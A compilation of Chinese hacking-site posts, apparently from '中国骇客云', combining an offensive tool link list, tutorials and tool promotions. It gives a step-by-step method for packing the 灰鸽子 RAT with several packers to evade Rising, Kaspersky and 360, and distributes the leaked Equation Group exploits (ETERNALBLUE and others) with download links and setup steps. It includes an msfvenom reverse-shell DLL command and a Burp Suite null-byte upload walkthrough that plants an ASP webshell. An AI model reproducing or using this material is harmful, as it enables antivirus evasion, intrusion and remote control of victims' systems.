中国骇客云平台教你揭秘微信支付存在的一些安全漏洞,之前官网上面有介绍,今天另介绍一种方法提醒网民。

首先这里介绍一种微信的支付安全尝试算是一些支付的一种安全策略漏洞。|
以前官网介绍的是一种二维码直接支付免密支付一种安全漏洞,那么今天官方网站介绍一种更为牛逼的支付免密支付、
教程开始:
首先打开微信,点击+号,点击收付款,点击第一行条形码,点击上面灰色文字显示:“点击可查看付款码数字”而支付胡付款码数字一旦被泄露给黑客或者是有心人,将会造成财产损失。
这里本站测试了 中国石化加油 使用该付款码进行支付,那么这些付款均存在以上的安全支付问题,容易造成付款码泄露。
微信厂商做了实时更新付款码,但是以上安全漏洞还是可以被利用。
条形码就是把付款码存储在条形码中使用机器扫描支付,如果条形码或者以上支付二维码,支付付款码被泄露,那么就会造成用户的财产损失。
这里就不上图了……
更多请关注本站官方网站。

Python工具库 感谢支持更多关注中国骇客云官网

漏洞及渗透练习平台:

WebGoat漏洞练习平台:

https://github.com/WebGoat/WebGoat

webgoat-legacy漏洞练习平台:

https://github.com/WebGoat/WebGoat-Legacy

zvuldirll漏洞练习平台:

https://github.com/710leo/ZVulDrill

vulapps漏洞练习平台:

https://github.com/Medicean/VulApps

dvwa漏洞练习平台:

https://github.com/RandomStorm/DVWA

数据库注入练习平台 :

https://github.com/Audi-1/sqli-labs

用node编写的漏洞练习平台,like OWASP Node Goat:

https://github.com/cr0hn/vulnerable-node

Ruby编写的一款工具,生成含漏洞的虚拟机:

https://github.com/cliffe/secgen

花式扫描器 :

Nmap端口扫描器:

https://github.com/nmap/nmap

本地网络扫描器:

https://github.com/SkyLined/LocalNetworkScanner

子域名扫描器:

https://github.com/lijiejie/subDomainsBrute

https://github.com/aboul3la/Sublist3r

https://github.com/TheRook/subbrute

https://github.com/infosec-au/altdns

linux漏洞扫描:

https://github.com/future-architect/vuls

基于端口扫描以及关联CVE:

https://github.com/m0nad/HellRaiser

漏洞路由扫描器:

https://github.com/jh00nbr/Routerhunter-2.0

迷你批量信息泄漏扫描脚本:

https://github.com/lijiejie/BBScan

Waf类型检测工具:

https://github.com/EnableSecurity/wafw00f

服务器端口弱口令扫描器:

https://github.com/wilson9x1/fenghuangscanner_v3

Fox-scan扫描器:

https://github.com/fengxuangit/Fox-scan/

信息搜集工具 :

社工收集器:

https://github.com/n0tr00t/Sreg

Github信息搜集:

https://github.com/sea-god/gitscan

github Repo信息搜集工具:

https://github.com/metac0rtex/GitHarvester

信息探测及扫描工具:

https://github.com/darryllane/Bluto

内部网络信息扫描器:

https://github.com/sowish/LNScan

远程桌面登录扫描器:

https://github.com/linuz/Sticky-Keys-Slayer

网络基础设施渗透工具

https://github.com/SECFORCE/sparta

SNMAP密码破解:

https://github.com/SECFORCE/SNMP-Brute

WEB:

webshell大合集:

https://github.com/tennc/webshell

渗透以及web攻击脚本:

https://github.com/brianwrf/hackUtils

web渗透小工具大合集:

https://github.com/rootphantomer/hacktoolsfor_me

XSS数据接收平台:

https://github.com/firesunCN/BlueLotus_XSSReceiver

XSS与CSRF工具:

https://github.com/evilcos/xssor

xss多功能扫描器:

https://github.com/shawarkhanethicalhacker/BruteXSS

web漏洞扫描器:

https://github.com/andresriancho/w3af

WEB漏洞扫描器:

https://github.com/sullo/nikto

渗透常用小工具包:

https://github.com/leonteale/pentestpackage

web目录扫描器:

https://github.com/maurosoria/dirsearch

web向命令注入检测工具:

https://github.com/stasinopoulos/commix

自动化SQL注入检查工具:

https://github.com/epinna/tplmap

SSL扫描器:

https://github.com/rbsec/sslscan

安全工具集合:

https://github.com/codejanus/ToolSuite

apache日志分析器:

https://github.com/mthbernardes/ARTLAS

php代码审计工具:

https://github.com/pwnsdx/BadCode

web指纹识别扫描:

https://github.com/urbanadventurer/whatweb

检查网站恶意攻击:

https://github.com/ciscocsirt/malspider

wordprees漏洞扫描器:

https://github.com/wpscanteam/wpscan

固件漏洞扫描器:

https://github.com/misterch0c/firminator_backend

数据库注入工具

https://github.com/sqlmapproject/sqlmap

Web代理:

https://github.com/zt2/sqli-hunter

新版中国菜刀:

https://github.com/Chora10/Cknife

git泄露利用EXP:

https://github.com/lijiejie/GitHack

浏览器攻击框架:

https://github.com/beefproject/beef

自动化绕过WAF脚本:

https://github.com/khalilbijjou/WAFNinja

https://github.com/owtf/wafbypasser

一款开源WAF:

https://github.com/SpiderLabs/ModSecurity

http命令行客户端:

https://github.com/jkbrzt/httpie

浏览器调试利器:

https://github.com/firebug/firebug

DISCUZ漏洞扫描器:

https://github.com/code-scan/dzscan

自动化代码审计工具

https://github.com/wufeifei/cobra

浏览器攻击框架:

https://github.com/julienbedard/browsersploit

tomcat自动后门部署:

https://github.com/mgeeky/tomcatWarDeployer

网络空间指纹扫描器:

https://github.com/nanshihui/Scan-T

burpsuit之J2EE扫描插件:

https://github.com/ilmila/J2EEScan

windows域渗透工具:

mimikatz明文注入:

https://github.com/gentilkiwi/mimikatz

Powershell渗透库合集:

https://github.com/PowerShellMafia/PowerSploit

Powershell tools合集:

https://github.com/clymb3r/PowerShell

powershell的mimikittenz:

https://github.com/putterpanda/mimikittenz

域渗透教程:

https://github.com/l3m0n/pentest_study

Fuzz:

Web向Fuzz工具

https://github.com/xmendez/wfuzz

HTTP暴力破解,撞库攻击脚本

https://github.com/lijiejie/htpwdScan

漏洞利用及攻击框架:

msf框架:

https://github.com/rapid7/metasploit-framework

pocsscan攻击框架:

https://github.com/erevus-cn/pocscan

Pocsuite攻击框架:

https://github.com/knownsec/Pocsuite

Beebeeto攻击框架:

https://github.com/n0tr00t/Beebeeto-framework

漏洞POC&EXP:

ExploitDB官方git版本:

https://github.com/offensive-security/exploit-database

php漏洞代码分析:

https://github.com/80vul/phpcodz

CVE-2016-2107:

https://github.com/FiloSottile/CVE-2016-2107

CVE-2015-7547 POC:

https://github.com/fjserna/CVE-2015-7547

JAVA反序列化POC生成工具:

https://github.com/frohoff/ysoserial

JAVA反序列化EXP:

https://github.com/foxglovesec/JavaUnserializeExploits

Jenkins CommonCollections EXP:

https://github.com/CaledoniaProject/jenkins-cli-exploit

CVE-2015-2426 EXP (windows内核提权):

https://github.com/vlad902/hacking-team-windows-kernel-lpe

use docker to show web attack(php本地文件包含结合phpinfo getshell 以及ssrf结合curl的利用演示):

https://github.com/hxer/vulnapp

php7缓存覆写漏洞Demo及相关工具:

https://github.com/GoSecure/php7-opcache-override

XcodeGhost木马样本:

https://github.com/XcodeGhostSource/XcodeGhost

中间人攻击及钓鱼

中间人攻击框架:

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

https://github.com/byt3bl33d3r/MITMf

Inject code, jam wifi, and spy on wifi users:

https://github.com/DanMcInerney/LANs.py

中间人代理工具:

https://github.com/intrepidusgroup/mallory

wifi钓鱼:

https://github.com/sophron/wifiphisher

密码破解:

密码破解工具:

https://github.com/shinnok/johnny

本地存储的各类密码提取利器:

https://github.com/AlessandroZ/LaZagne

二进制及代码分析工具:

二进制分析工具

https://github.com/devttys0/binwalk

系统扫描器

https://github.com/quarkslab/binmap

rp:

https://github.com/0vercl0k/rp

Windows Exploit Development工具

https://github.com/lillypad/badger

二进制静态分析工具(python):

https://github.com/bdcht/amoco

Python Exploit Development Assistance for GDB:

https://github.com/longld/peda

对BillGates Linux Botnet系木马活动的监控工具

https://github.com/ValdikSS/billgates-botnet-tracker

木马配置参数提取工具:

https://github.com/kevthehermit/RATDecoders

Shellphish编写的二进制分析工具(CTF向):

https://github.com/angr/angr

针对python的静态代码分析工具:

https://github.com/yinwang0/pysonar2

一个自动化的脚本(shell)分析工具,用来给出警告和建议:

https://github.com/koalaman/shellcheck

基于AST变换的简易Javascript反混淆辅助工具:

https://github.com/ChiChou/etacsufbo

EXP编写框架及工具:

二进制EXP编写工具:

https://github.com/t00sh/rop-tool

CTF Pwn 类题目脚本编写框架:

https://github.com/Gallopsled/pwntools

an easy-to-use io library for pwning development:

https://github.com/zTrix/zio

跨平台注入工具:

https://github.com/frida/frida

哈希长度扩展攻击EXP:

https://github.com/citronneur/rdpy

隐写:

隐写检测工具

https://github.com/abeluck/stegdetect

各类安全资料:

data_hacking合集:

https://github.com/ClickSecurity/data_hacking

mobile-security-wiki:

https://github.com/exploitprotocol/mobile-security-wiki

书籍《reverse-engineering-for-beginners》:

https://github.com/veficos/reverse-engineering-for-beginners

一些信息安全标准及设备配置:

https://github.com/luyg24/IT_security

APT相关笔记:

https://github.com/kbandla/APTnotes

Kcon资料:

https://github.com/knownsec/KCon

《DO NOT FUCK WITH A HACKER》:

https://github.com/citypw/DNFWAH

各类安全脑洞图:

https://github.com/phith0n/Mind-Map

信息安全流程图:

https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428

各类CTF资源

近年ctf writeup大全:

https://github.com/ctfs/write-ups-2016

https://github.com/ctfs/write-ups-2015

https://github.com/ctfs/write-ups-2014

fbctf竞赛平台Demo:

https://github.com/facebook/fbctf

ctf Resources:

https://github.com/ctfs/resources

ctf及黑客资源合集:

https://github.com/bt3gl/My-Gray-Hacker-Resources

ctf和安全工具大合集:

https://github.com/zardus/ctf-tools

ctf向 python工具包

https://github.com/P1kachu/v0lt

各类编程资源:

大礼包(什么都有):

https://github.com/bayandin/awesome-awesomeness

bash-handbook:

https://github.com/denysdovhan/bash-handbook

python资源大全:

https://github.com/jobbole/awesome-python-cn

git学习资料:

https://github.com/xirong/my-git

安卓开源代码解析

https://github.com/android-cn/android-open-project

python框架,库,资源大合集:

https://github.com/vinta/awesome-python

JS 正则表达式库(用于简化构造复杂的JS正则表达式):

https://github.com/VerbalExpressions/JSVerbalExpressions

Python:

python 正则表达式库(用于简化构造复杂的python正则表达式):

https://github.com/VerbalExpressions/

python任务管理以及命令执行库:

https://github.com/pyinvoke/invoke

python exe打包库:

https://github.com/pyinstaller/pyinstaller

Veil-Evasion免杀项目:

https://github.com/Veil-Framework/Veil-Evasion

py3 爬虫框架:

https://github.com/orf/cyborg

一个提供底层接口数据包编程和网络协议支持的python库:

https://github.com/CoreSecurity/impacket

python requests 库:

https://github.com/kennethreitz/requests

python 实用工具合集:

https://github.com/mahmoud/boltons

python爬虫系统:

https://github.com/binux/pyspider

科学上网:

科学上网工具

https://github.com/XX-net/XX-Net

福利:

微信自动抢红包动态库

https://github.com/east520/AutoGetRedEnv

微信抢红包插件(安卓版)

https://github.com/geeeeeeeeek/WeChatLuckyMoney

hardsed神器:

https://github.com/yangyangwithgnu/hardseed

甲方安全工程师生存指南

web索引及日志搜索工具:

https://github.com/thomaspatzke/WASE

开源日志采集器:

https://github.com/wgliang/logcool

扫描CS结构的web debuger

https://github.com/Kozea/wdb

恢复sqlite数据库删除注册信息:

https://github.com/aramosf/recoversqlite/

gps欺骗检测工具:

https://github.com/zxsecurity/gpsnitch

应急处置响应框架:

https://github.com/biggiesmallsAG/nightHawkResponse

web安全开发指南:

https://github.com/FallibleInc/security-guide-for-developers

各个知名厂商漏洞测试报告模板:

https://github.com/juliocesarfort/public-pentesting-reports linux下恶意代码检测包:

https://github.com/rfxn/linux-malware-detect

操作系统运行指标可视化框架:

https://github.com/facebook/osquery

恶意代码分析系统:

https://github.com/cuckoosandbox/cuckoo

定期搜索及存储web应用:

https://github.com/Netflix/Scumblr

事件响应框架:

https://github.com/google/grr

综合主机监控检测平台:

https://github.com/ossec/ossec-hids

分布式实时数字取证系统:

https://github.com/mozilla/mig

Microsoft & Unix 文件系统及硬盘取证工具:

https://github.com/sleuthkit/sleuthkit

蜜罐:

SSH蜜罐:

https://github.com/desaster/kippo

蜜罐集合资源:

https://github.com/paralax/awesome-honeypots

kippo进阶版蜜罐:

https://github.com/micheloosterhof/cowrie

SMTP 蜜罐:

https://github.com/awhitehatter/mailoney

web应用程序蜜罐:

https://github.com/mushorg/glastopf

数据库蜜罐:

https://github.com/jordan-wright/elastichoney

web蜜罐:

https://github.com/atiger77/Dionaea

远控:

用gmail充当C&C服务器的后门

https://github.com/byt3bl33d3r/gcat

开源的远控:

https://github.com/UbbeLoL/uRAT

c#远控:

https://github.com/hussein-aitlahcen/BlackHole

中国骇客云教大家如何免杀

免杀,一个在黑客界永不过时的话题。从木马和杀毒软件的第一次交锋开始就始终没有中断过,黑客程序开发者和杀毒软件的技术人员的始终在较量着。面对强大的杀毒软件,病毒的免杀就显的尤为重要。免杀的方式基本分为三种:修改特征码、添加花指令和壳,最后一次,危险漫步就来和大家谈谈加壳这种最常见的免杀方式。

有些动植物长着坚硬的外壳,因为它们都着脆弱的身体,需要用坚硬的外壳来保护自己。根据这一理论,一种叫壳的程序出现了。壳诞生的初衷是为了保护自己的程序不被破解和修改,病毒作为一种特殊的程序,壳同样也可以用于病毒的保护。通过这一现象,壳的用途出现了一个翻天覆地的转变。现在提到壳,大家都会想到病毒的免杀。

一般来说,壳分为两种:加密壳和压缩壳。加密壳主要的作用是对程序进行加密,但加密后程序体积会变大。压缩壳主要用于对程序的压缩,能够减小程序的体积。另外,还有一些特殊的壳既可以加密,同时也可以压缩。

加壳不失为一种不错的免杀方式,但随着杀毒软件的普及和病毒库的日益扩大,越来越多的加壳程序被列入病毒的行列。那么我们还能使用这些壳为病毒免杀吗?YES!但我们要稍微动动手脚了。

如果说单一的添加壳,用不了多久就会被杀,人品不行的一下就被主动防御和云查杀给秒了…

我们可以把一些壳混合起来为程序加壳,也就是题目提到的复合加壳,这样也可以起到免杀的效测试才行。

W(%EL[ZASU3CU`%{N[J23QV.png

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。但要注意的是:尽量选择一些不常见的加壳程序,加壳要保证一定的数量,不能只加一两个壳。

而且加壳后不等于100%免杀,还要靠我们不断分析测试才行。中国骇客云官方网站hackerschina.org

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是

RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。

简单介绍一下使用方法,左边是选择要加壳的文件,右边是设置输出文件位置。把下面所有的选项全部选上,这些选项的意思是:反编译、反沙盘等等,我们选上就可以了。然后点击“Crypt File”就为灰鸽子加上了加密壳。

现在还不能添加压缩壳,因为每个壳的兼容性都不一样,我们必须进行资源释放处理。下面我们要使用到“FreeRes”。释放资源后选择“功能”中的“建立可编辑资源”对文件进行资源重建。

接下来我们就用到压缩壳,我选用的是“蚂蚁加壳工具和Mini_pack”,因为他们都是压缩壳,经过我测试,这两个壳在压缩时不需要进行资源释放处理。勾好配置后,找到服务端后进行

二次加壳。压缩完毕,用加壳后的灰鸽子过一下瑞星、卡巴和360,都没有报毒。

中国骇客云平台最新公开方程式组织黑客工具,赶紧下载吧!~~~~

GitHub:https://github.com/x0rz/EQGRP_Lost_in_Translation

网盘下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4

解压密码”Reeeeeeeeeeeeeee”

Start.jar //图形界面

EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。

Explodingcan IIS漏洞利用工具,只对Windows 2003有影响Eternalromance   SMB 和 NBT漏洞利用工具,影响端口139445 Emphasismine   通过IMAP漏洞攻击,攻击的默认端口为143Englishmansdentist   通过SMTP漏洞攻击,默认端口25Erraticgopher 通过RPC漏洞攻击,端口为445Eskimoroll   通过kerberos漏洞进行攻击,默认攻击端口88Eclipsedwing   MS08-67漏洞利用工具Educatedscholar   MS09-050漏洞利用工具Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口Zippybeer   SMTP漏洞利用工具,默认端口 445Eternalsynergy   SMB漏洞利用工具,默认端口 445Esteemaudit   RDP漏洞利用工具,默认攻击端口为3389

 

使用方法:

注意,必须安装32位python2.6相关版本,其他版本不奏效。

  1. 下载python2.6并安装
  2. 下载pywin32并安装
  3. 将C:\Python26添加到环境变量PATH中。

修改\windows\fb.py

注释掉:

 #addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)

 

将windows\lib\x86-Windows | x64-Windows  加入到系统环境变量

    1.生成dll命令:msfvenom -p windows/x64/shell_reverse_tcp   LHOST=x.x.x.x LPORT=8888 -f dll > shell.dll

 

转载文章请注明,转载自:中国骇客平台官网www.hackerschina.org

 

XSSF是一款XSS漏洞测试平台,该产品可以把XSS漏洞的真实危害暴露出来。这个产品为教学、渗透测试和合法的研究服务。

XSSF通过XSS漏洞与目标浏览器建立连接进行更加深入的攻击利用测试。

XSSF提供强大的API库,并且集成于Metasploit渗透测试框架中。

Windows安装XSSF模块
下载安装Metasploit windows免费版:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe

安装完成后将下xssf源码放到Metasploit安装目录msf3下,同样将XSSF文件夹中的data、lib、modules、plugins与msf3下的文件夹合并即可。

下载xssf源代码:选择最新的3.0下载,下载地址  xssf-3.0

运行metasploit客户端,加载xssf模块:msf > load xssf

BackTrack 5 Metasploit更新方法

虚拟机运行BackTrack5 r3在更新Metasploit时卡在pg-0.15.1,升级报错无法正常升级。

原因是msf并没有用BT5内置的Ruby,而是利用自带的Ruby版本为1.9.1,已经很古老了……所以升级系统的Ruby版本也会无济于事,但是按照下面的步骤更新,即可将msf更新到最新。

解决办法:

找到以下文件打开(注:32位、64位)

然后再找到:

修改为:

然后切换至/opt/metasploit/msf3再运行/opt/metasploit/ruby/bin/bundle install
最后msfupdate!

中国骇客云之killall万能钥匙3.2.16 wifi万能钥匙显密码 去广告

说明:万能钥匙,不是破解密码,是分享wifi密码的软件。

通过这个软件可以获取到别人分享过的wifi从而连接上无线网。但是这个软件广告比较多,并且并不会显示wifi密码。

所以就有了这个修改版,这个修改版去除了程序广告,并且可以把这个wifi密码显示出来。

本软件根据凯旋大神的去广告版本修改,再次表示感谢,绝对同样是深改,其实这是废话了,参考的肯定是完全一致的,和凯旋版本对比,修改的只会多不会少。并且还多出来一个显示密码功能。当然本人也就一部手机,有些细节没办法测试的面面俱到。可能有些机型有些小问题,这个是没办法避免的。。。。

修改给自己使用的版本,顺便分享一下,其他机型请自测,如发现问题请反馈,谢谢!

1、去除界面广告,扁平化图标,更加美观,极致精简仅有6M。

2、去除所有不必要的敏感权限和服务项。

3、去除状态栏通知和退出提醒。

4、去除后台下载广告行为,并让LBE安全大师,360手机卫士扫描不到广告提示。

5、去除地图验证,可以查看地图。

6、去除默认分享密码行为。

7、修改为共存版可与原版同时安装,名称为万能钥匙。

8、归纳软件产生的文件为/Android/data/com.killall.wifilocating/目录,卸载软件会自动清除。

9、不用ROOT手机就能够显示密码,当首次连接上热点自动弹出密码。

题外话:看到有些网友说不知道这个美化版怎么显示密码。只有在第一次连接上一个从未连接过的新wifi热点就弹出密码的。点击“万能钥匙自动连接”,获取到密码就会弹出密码,之后就记住密码不会弹出密码了。如果第一次没看清楚。可以对wifi点一下选择“忘记网络”,这样“万能钥匙自动连接”选项又出来了,再次点击“万能钥匙自动连接”就会重新弹出密码。只有点击“万能钥匙自动连接”才会弹出密码的。另外,之前发布几个版本,有些小白以为LBE安全大师和360安全卫士扫描到修改版万能钥匙有广点通广告。就以为软件广告没有去除干净。其实这只是smali里面一些失去功能的广告代码,这类安全软件扫描到这些失去功能的广告代码也提示有广告,其实去广告只要去除了apk活动项,这些广告代码就相当于是死的了,不会产生广告行为的。软件有没有广告是在界面看得到的。所以这次为了防止那些什么都不懂的小白吐槽,就去除了这些广告代码,虽然也没多大意义。但是估计小白和某些处女座会喜欢。嘿嘿。。。另外请某些素质低的人不要骂人,不喜欢就不要用,没逼你使用。下面直接公布下载地址。支持就不用说了,你们懂的。。。。

可能被修改的太狠 了。万能钥匙从3.2.16开始更新了SO签名校验,我对SO修改这块技术太渣,分析了很久找不到绕过方法,就懒得分析了,所以直接使用空道大神的HOOK模块给通杀签名校验了,这样可能导致某些不支持HOOK的X86型号的安卓手机没办法搜到可用热点,但是支持绝大多数手机的。如果发现搜索不到可用的热点,建议使用我之前修改的旧版。万能钥匙这个软件没必要一直追新,实际上大多时候只是更新了个版本号,软件界面和广告,wifi密码服务器还是一样的,并不会影响使用效果,也不会能够多扫描到可用热点。

因法律法规及政策原因,已停止提供下载

中国骇客云之Burp suite网站攻击利器快速处理上传截断

Burp suite是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该多去网上学习下。

由于该工具是通过Java写的,所以需要安装JDK,关于JDK的安装,笔者简单介绍下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键”我的电脑”->”属性”一>”高级”一>”环境变量”,在系统变量中查找Path,然后点击编辑,把JDK的bin目录写在path的最后即可。

通过CMD执行下javac看是否成功安装。安装配置成功则会显示下图信息。

这里的测试网址是笔者帮朋友测试某站点时获取的,登陆后台后可以发表新闻,但是只能上传图片,然后发现新闻的图片目录在upload/newsimg下。

后台有个”网站资料设置”的功能,可以自行定义新闻图片的路径,但是当尝试把新闻图片路径改为“upload/newsimg.asp/”时,上传图片竟然上传失败了,所以这种方法失效。

接下来我们尝试上传截断漏洞,可能大家经常用的是通过WSockExpert抓包,修改后通过nc来提交获取shell,但是大家会发现那样有点繁琐,我们看看今天的方法是多么高效!

QQ截图20170314135253.png

首先运行Burp suite允许burpsuite.jar,然后点击“proxy”标签,会发现burp suite默认的代理监听端口为8080,如果怕跟自己电脑上的某个端口冲突的话,可以点击“edit”进行编辑。笔者使用默认端口。

然后打开本地浏览器的代理设置的地方,IE一般为“工具”->“Internet选项”->“连接”->“局域网设置”,其他浏览器大致相同。

设置代理之后,我们到后台的某个上传新闻图片的地方上传一个图片木马,我这里的图片木马为asp一句话。

点击上传之后,我们到proxy的“history”选项,会发现该(本文来自危险漫步博客)网站的某个POST提交请求,我们选中该链接后,右键选择“send to repeater”。

我们会发现刚才提交的请求的数据包,那么我们看一下,有一项是上传路径的地方,我们以前进行截断上传的时候经常修改这个地方,这次也不例外,我们把上传路径改为”upload/shell.asp”后面有一个空格。

然后选择”hex”进入16进制编辑模块,将空格的16进制20改为00,即null。

然后点击上方的“go”即可进行数据包的提交,提交成功后会返回提交的路径,笔者通过菜刀就直接连接到一句话后门了。大家进行测试吧!

中国骇客云工具远控工具之手机远控远程控制你的Android手机

谈到远程控制android手机软件,很早之前,德国开发的Teamviewer软件即已经做到在电脑和手机之间灵活的双向切换控制操作,稍微略显不足的地方就是Teamviewer只支持安卓系统的手机。现在危险漫步要给大家介绍的这款软件是Webkey,不但支持安卓系统手机的操作,同时可以摆脱数据线连接,在无线的网络中远程控制手机。这里以三星手机T959为例(很普通的手机,请不要扔番茄和鸡蛋)。点击我们下载下来的webkey.apk安装文件(可以直接通过数据线连接手机安装或是有wifi的,安装一个豌豆荚连接下,双击安装),红色圆圈出来的即是已经安装的webkey软件。

2K5N03D2H2X{K8G`M{83E)I.jpg

这样就完成了安装过程。这个软件的一个优点就是可以通过网络来执行远程控制操作,摆脱数据线的困扰,只要你连接上wifi,即可以很方便的操作。当然不可缺少的条件就是你的手机必须是root权限,之前应该是有不少合约机,出厂并未激活root.貌似现在应该大多都会有root权限了。

下面需要对webkey进行简单的设置,取消开机启动。这样一来就可以避免每次手机在换电池或是做其他操作的过程中因为重启而每次开机都启动webkey。

去除手机上方状态栏显示webkey的图标状态,尽管去除了,但是webkey-样会在系统后台继续运行。完成开机和运行状态的一个设置。

只要保证“保持与androdwebkey的连接”和“允许浏览器中注册新用户”两个选项被选中就可以。“使用此IP地址连接DynDNS”,这个选项是你有获取公网地址,并将地址解析到外网的网站上,通过这个来访问。这边就跳过,有兴趣的朋友可以去注册一个域名站点进行测试。

点击“手机昵称设置”按钮进行对呢称的简单设置。帮你的手机设置一个好记的名称。往后通过浏览器远程控制手机的时候,访问的管理地址就是Webkey的域名加上你手机昵称路径,比如这里的jihn就是你的手机昵称了。既然可以通过wifi连接网络远程控制你的手机,webkey也给出了手机在网络中自动获取的一个IP地址,你一样可以通过输入172.18.14.233来管理访问你的手机,这里172.18.14.233就是你局域网分配给你手机的IP地址。下一步,也是比较重要的一步操作,那就是用户管理了。当然要设置成不是每个用户都可以远程控制你的手机。让我们自己动手来为手机创建一个新用户吧。这样设置完成后,我们将手机和电脑都连接到互联网上之后,就可以对手机进行远程控制了。不通过手机数据线的哦。上面提到的第5个设置步骤中有讲到局域网的分配给手机的IP地址,这里也可以通过外网远程控制你的手机,也就是获知手机的公网IP的话,一样可以是手机在家,人在公司或是路上,前提是要有wifi,呵呵,连接控制你的手机是没问题的。查看手机公网地址可以通过手机浏览器访问诸如ip138或是114best来查看手机所在的公网IP地址。以下简单示范局域网内如何远程控制手机。

打开桌面的浏览器访问androidwebkey或者是192.168.1.102,就可以看到远程控制管理界面了。图片显示的页面地址源显示未知,实际上是来自美国的IP地址,只是网站数据库没有收录而已,不影响操作控制。这边就提示要求我们输入用户名和密码,也就是我们在上述操作中谈到的第6个步骤中的用户和密码。在这个简洁的管理页面中,给大家分享下远程控制管理的功能。

(1)页面布局

大致的页面布局如下:顶端是功能导航条,页面左边显示的是手机的实时远控屏幕。右边是操作的功能菜单,右下方还有个远程聊天窗口。一起来了解一下每个标签页的具体应用。

(2)电话选项卡

这是比较常用的功能,同样是登录控制台后的第一个页面。设置完成之后可以在远程界面中用鼠标直接操作你的手机,譬如设置呼叫转移。

远控区最下方的一排功能键是Webkey为手机设置的,它等同于手机上的物理按键,更有趣的是,按键的键值还可以自行更改设置。

(3)功能菜单

右边的功能菜单也很丰富,基本的远程控制操作都可以在这里实现:远程键盘、打开网址、运行程序、手机信息、关闭进程等。个人比较喜欢的是远程键盘,相信可以用键盘代替手机的输入法或者是手写,速度应该是有很大的提升。像手机信息或是关闭进程一样是很实用的一些功能。

(4) GPS

这是个很强大的功能,可以起到防止手机被盗的效果。一旦你的手机被偷走,就可以知道手机的位置。呵呵,本人手机是不怎么好,应该是不会引起兴趣了,不过一样可以起到防范未然的效果,还可以定位最后已知手机的位置。而且提供了两种定位方式,在室外可以通过GPS卫星精确定位,倘若手机在室内还可以得到运营商定位。是不是很好用的GPS呢?

(5)短信和通话列表

这两个功能很简单,可以实现远程收发短信,查看通话记录详情。这样即使你手机忘记带也可以知道手机上的一些通话来往的情况,清楚是谁发了短信给你了。并且你可以远程控制你的手机给人家回复,这一切只需要你在电脑上通过网络直接在这个管理页面操作,简单方便,快捷,不需要再时不时的担心你的手机是否随身携带或是烦恼手写输入或是手机键盘给对方发短信的速度太慢。

(6) Net

这是一个很实用的功能,前提是要拥有root权限。通过net可以帮助你了解你的手机网络流量使用情况,包括各个网络接口,也就是和tcp,udp收发包一样的记录信息,按日统计,(7)通知和终端

这两个选项卡可能对普通用户用处不大。通知的意思是Webkey会每隔半分钟刷新一次,显示未读信息及未接电话,当操作触发时,手机会按照你预先设置的提醒方式来显示内容。终端就是一个远程命令行,你可以通过它在shell命令行下面运行Linux指令。

(8)导出

这个功能也是相当的不错。不过在当你手机失窃并基本回归无望的时候才用到它。它能帮你远程获取手机里的联系人、短信、通话记录,然后就像豌豆荚或是91助手一样可以导出这些信息并保存到本地电脑硬盘中。

(10)目录浏览和SD存储卡

这两个功能就相当于是利用wifi连接网络后,在局域网内进行远程文件管理器。采用了Aj aXplorer组件,让远程文件管理也很方便。

你还可以远程从你手机里下载SD卡里的任何文件传输或者拷贝到其他位置,如果是图片文件的话,还可以远程预览图片。

结尾再和大家聊一下以下几点事项:

这个应用软件属于高级玩家应用,需要一定的动手操作能力。因为有的功能需要对手机ROOT(合约机可能不太合适做这个操作了)。

要通过电脑对手机进行远程控制,那么你的手机必须保持网络在线并连通。通过网络控制手

机时,可能产生较大流量,请确定你有足够的流量,并保证手机实时在线。建议手机还是使用wifi连接互联网网络,这样一来和电脑可以很融洽的在一个网络内进行对话操作。

好了,希望大家感兴趣的话,可以自己尝试安装软件来试试看,有兴趣的话可以到我的博客上面与危险漫步进行指导和交流。

渗透神器之:Layer子域名挖掘机4.2纪念版增加功能 中国骇客云平台工具下载

下载地址连 接 链 接: https://pan.baidu.com/s/1pLoGnDh 密码: g3f6

更新内容如下:
1、降级.NET版本至4.0,因之前有人反馈WIN2003无法使用,因为2003不能安装.NET4.5,现在win2003及XP都可以正常使用。
2、增加获取web服务器信息的功能,如果在渗透过程中,担心软件自动访问web服务器会记录到web日志,可以关闭获取WEB服务器信息功能
3、增加线程控制,因有不少人反馈,开全速的时候,他们的小电脑会卡死,反正我电脑跑起来妥妥的,所以默认设置为全速。
4、增加右键复制所选项,胖子硬提出的需求。
5、修复了一个线程锁的问题,没修复前会引起程序崩溃。
PS:为了适应不同的分辨率,首次启动设置了全屏,可点击右上角的最大化按钮复位到我截图的这个小窗口。

使用说明:
